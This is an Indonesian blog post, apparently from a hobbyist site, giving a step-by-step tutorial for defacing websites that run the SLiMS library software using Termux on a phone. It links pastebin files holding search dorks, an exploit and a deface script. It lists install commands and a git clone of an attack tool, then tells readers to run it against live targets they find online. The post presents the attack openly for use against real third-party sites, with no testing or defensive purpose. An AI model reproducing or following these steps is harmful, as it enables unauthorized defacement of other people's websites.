Tutorial cara deface metode SLIMS ft termux 🤣 terbaru 2020



 Assalamualaikum warahmatullahi wabarokatuh 🔥 kembali lagi di web bloger Yongkynb blogspot com kali ini saya akan memberikan tutorial cara deface metode SLIMS ft termux 🤣 terbaru 2020

Untuk bahan² we tarok sini

Okeh simak terus Tutorial nya ganas

Bahan² yang di butuh kan

1. termux🤣

2.live target slimas

3.dork + xploit nya https://pastebin.com/raw/6z4ZDq2W

4.tools termuxnyah https://pastebin.com/raw/6z4ZDq2W

5.Sc txt https://pastebin.com/raw/HNCii9Rv

Tuh salin aja 




1.Cara pertama lu dorking dulu pakek Dork di atas tuh nah kalau udah Nemu live target nya nih live target gue 

Pilih salah satu website nya yang mau lu depess

Nah kalau udah Nemu masukin xploit nya tar jadi nya kek gini kalau gk kek kini gk vunl okwh hwker

Terus lu masuk ke temux masukin tools nya 
pkg install python2
pkg install pip2
pip2 install colorama
pip2 install bs4
pip2 install requests
pkg install git
git clone https://github.com/Odiq1337/slimass
cd slimass
nano (buat nama script lu bentuk txt)
Python2 slim.py Scriptlu.txt

Nah tuh kalau udah

Masukan SC lu di sini lalu simpan cara simpan nya tekan crtl terus x terus ketik y enter


Nah kalau udah lu pangill tools nya ketik
Python2 slim.py nama SC lu

Nah kalau kek gini masukan live target nya yang tadi ini okwh hwker
Nah kalau kek gini berarti udah selesai 😂 gampang kan Tutorial nya okeh terimakasih telah berkunjung ke blogger gue yongky jangan lupa follow








Komentar

Posting Komentar

Postingan populer dari blog ini

Cara Membuat Audio di HTML

TUTORIAL CARA MEMBUAT DIOS SQL INJECT =[PRINT NICK IMAGE DATABASE]=